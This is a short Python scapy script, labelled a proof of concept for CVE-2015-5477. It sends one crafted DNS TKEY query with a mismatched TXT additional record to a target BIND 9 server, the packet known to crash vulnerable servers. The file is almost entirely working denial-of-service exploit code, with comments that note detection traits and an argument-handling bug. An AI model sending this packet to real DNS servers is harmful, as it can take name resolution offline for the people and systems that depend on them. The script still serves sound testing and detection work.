#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Author : [email protected] <github.com/tintinweb>
import sys
from scapy.all import *
def main():
    """Send one CVE-2015-5477 test query (BIND 9 TKEY handling) to a DNS server.

    Command line: ``<target.ip> [qname=.] [--debug]``.  The function builds a
    single DNS query for a TKEY record (QTYPE 0xf9 = 249, class ANY) whose
    header announces one additional record, appends a TXT record with the
    same owner name, hands the packet to scapy's send() over UDP and exits.
    No reply is read, so the script itself does not report the server's state.

    For detection work, the traits visible in this packet are a TKEY *query*
    carrying an additional-section record of the same name that is not of
    type TKEY.

    Exits with status 1 after printing the usage text when no target is
    given, and with status 0 once the packet has been sent.
    """
    if len(sys.argv) <= 1:
        usage = "\nUSAGE: %s <target.ip> [qname=.]\n" % (sys.argv[0])
        print usage
        sys.exit(1)

    target = sys.argv[1]

    # NOTE(review): this test counts how often "--debug" appears in argv and
    # needs more than two occurrences, so in normal use qname stays "." and
    # the optional [qname] shown in the usage text is ignored.
    if sys.argv.count("--debug") > 2:
        qname = sys.argv[2]
    else:
        qname = "."

    debug = "--debug" in sys.argv
    # scapy's verbosity follows the --debug switch.
    conf.verb = debug

    print "[ ] CVE-2015-5477 BIND 9 PoC"
    print "[i] target: %s" % target
    print " [+] sending DNSQ TKEY with additional record ..."

    # Question section: one TKEY query (0xf9 == 249) in class ANY.
    question = DNSQR(qname=qname, qtype=0xf9, qclass='ANY')
    # Record for the additional section: same owner name, but type TXT.
    extra = DNSRR(rrname=qname, type='TXT', rclass='ANY', rdata="x")
    # Per the original author, scapy mangles additional records passed as
    # DNS(ar=..), so arcount is set by hand and the record is appended as
    # the next layer instead.
    p = DNS(rd=1, qd=question, arcount=1) / extra

    if debug:
        p.show()

    # UDP() is left at scapy's defaults; only the destination IP is set.
    datagram = IP(dst=target) / UDP() / p
    send(datagram)
    print " [!] pkt sent!"
    sys.exit(0)
# Script entry point: run main() only when the file is executed directly,
# not when it is imported as a module.
if __name__ == "__main__":
    main()